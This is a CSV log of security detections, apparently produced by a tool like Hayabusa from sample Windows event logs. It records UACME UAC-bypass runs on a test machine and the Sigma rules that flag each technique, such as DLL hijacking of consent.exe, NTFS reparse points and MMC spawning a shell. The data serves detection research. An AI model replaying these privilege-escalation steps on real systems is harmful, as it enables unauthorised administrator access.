2019-08-03 21:08:20.731 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 22 | LID: 0x18d3b3 | PID: 4964 | PGUID: 747F3D96-7934-5D45-0000-0010A2A40701",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:21.128 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC500 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7564 | PGUID: 747F3D96-7934-5D45-0000-0010CAB90701,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 7564 -s 152 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 272 00000280644BC500 | LID: 0x3e7 | PID: 7324 | PGUID: 747F3D96-7935-5D45-0000-001066CA0701,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:23.524 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 22 | Image: C:\Windows\System32\consent.exe.local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\comctl32.dll | Process: C:\Windows\System32\consent.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 7564 | PGUID: 747F3D96-7934-5D45-0000-0010CAB90701 | Hash: SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:23.554 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 272 00000280644BC500 | LID: 0x3e7 | PID: 4192 | PGUID: 747F3D96-7937-5D45-0000-00100D290801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\consent.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7564 | Src PGUID: 747F3D96-7934-5D45-0000-0010CAB90701 | Tgt PID: 4192 | Tgt PGUID: 747F3D96-7937-5D45-0000-00100D290801,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:25.165 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:55.408 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3116 | PGUID: 747F3D96-7957-5D45-0000-00100E620A01,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 37 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
2019-08-03 21:31:15.096 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\GdiPlus.dll | Process: C:\Windows\explorer.exe | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
2019-08-03 21:31:15.096 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
2019-08-03 21:31:15.354 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 37 | LID: 0x18d3fb | PID: 932 | PGUID: 747F3D96-7E93-5D45-0000-0010AA622601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
2019-08-03 21:31:15.364 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 400 00000280644220C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3796 | PGUID: 747F3D96-7E93-5D45-0000-001008652601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 37 | LID: 0x18d3b3 | PID: 6576 | PGUID: 747F3D96-7E93-5D45-0000-0010AA8A2601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
2019-08-03 21:31:27.049 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2352 | PGUID: 747F3D96-7E9E-5D45-0000-001080D92601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
2019-08-03 21:31:27.683 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx
2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 36 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:34.875 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\MSCOREE.DLL | Process: C:\Windows\explorer.exe | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:34.875 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:35.085 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3fb | PID: 2740 | PGUID: 747F3D96-7EE2-5D45-0000-0010E49C2801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:35.137 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 400 00000280644220C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3652 | PGUID: 747F3D96-7EE2-5D45-0000-0010F19E2801,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3b3 | PID: 2348 | PGUID: 747F3D96-7EE3-5D45-0000-0010AFC12801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:36.794 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | Process: C:\Windows\System32\dcomcnfg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3fb | PID: 7180 | PGUID: 747F3D96-7EE4-5D45-0000-001015F72801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:36.812 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064471E00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1708 | PGUID: 747F3D96-7EE4-5D45-0000-001029F92801,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:37.160 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | Process: C:\Windows\System32\dcomcnfg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3b3 | PID: 1240 | PGUID: 747F3D96-7EE4-5D45-0000-001091122901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:37.184 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\mmc.exe C:\Windows\system32\comexp.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | LID: 0x18d3b3 | PID: 7636 | PGUID: 747F3D96-7EE5-5D45-0000-001076162901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:37.261 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 344 | PGUID: 747F3D96-7EE5-5D45-0000-0010B71B2901,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:38.640 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:49.013 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC3D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 796 | PGUID: 747F3D96-7EF1-5D45-0000-0010DDBF2901,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 21:32:49.525 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7400 | PGUID: 747F3D96-7E25-5D45-0000-0010D0AF2301,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx
2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 38 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3508 | PGUID: 747F3D96-9122-5D45-0000-0010710D6101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
2019-08-03 22:50:26.782 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Process: C:\Windows\explorer.exe | PID: 3508 | PGUID: 747F3D96-9122-5D45-0000-0010710D6101,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
2019-08-03 22:50:27.060 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 398 000002806443AF40 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5128 | PGUID: 747F3D96-9122-5D45-0000-001042326101,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
2019-08-03 22:50:27.356 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 38 | LID: 0x18d3b3 | PID: 4372 | PGUID: 747F3D96-9123-5D45-0000-001087596101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
2019-08-03 22:50:29.101 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50105 (MSEDGEWIN10.home) | Dst: 185.199.111.153:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 4372 | PGUID: 747F3D96-9123-5D45-0000-001087596101,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" | Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" | LID: 0x18d3b3 | PID: 3180 | PGUID: 747F3D96-9124-5D45-0000-001022926101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
2019-08-03 22:50:29.459 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" | LID: 0x18d3b3 | PID: 6236 | PGUID: 747F3D96-9124-5D45-0000-00103B986101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
2019-08-03 22:50:29.461 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Temp\fubuki.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3180 | Src PGUID: 747F3D96-9124-5D45-0000-001022926101 | Tgt PID: 6236 | Tgt PGUID: 747F3D96-9124-5D45-0000-00103B986101,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx
2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 39 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4480 | PGUID: 747F3D96-A356-5D45-0000-001029AA9901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,high,Evas | PrivEsc,UAC Bypass Using .NET Code Profiler on MMC,,rules/sigma/file_event/sysmon_uac_bypass_dotnet_profiler.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\pe386.dll | Process: C:\Windows\explorer.exe | PID: 4480 | PGUID: 747F3D96-A356-5D45-0000-001029AA9901,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
2019-08-04 00:08:06.730 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 39 | LID: 0x18d3fb | PID: 1492 | PGUID: 747F3D96-A356-5D45-0000-0010C5C59901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
2019-08-04 00:08:06.796 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 376 0000028064463A00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7840 | PGUID: 747F3D96-A356-5D45-0000-001006D49901,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
2019-08-04 00:08:07.144 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 39 | LID: 0x18d3b3 | PID: 4056 | PGUID: 747F3D96-A356-5D45-0000-001014F99901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
2019-08-04 00:08:07.508 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\IEUser\AppData\Local\Temp\pe386.dll | Process: C:\Windows\System32\mmc.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 4056 | PGUID: 747F3D96-A356-5D45-0000-001014F99901 | Hash: SHA1=60BFDEAE730B165AF65A82817CED76F7400C9CF0,MD5=CC591D9CA772C818093FED853BF64848,SHA256=EC793B0A45BDB2F15D210E545A893AA096D68FF537DD022C4B443BDE2A448491,IMPHASH=069E5461D2FBAD8D4C3909C4E0340847",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | LID: 0x18d3b3 | PID: 5396 | PGUID: 747F3D96-A357-5D45-0000-0010BD149A01",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx
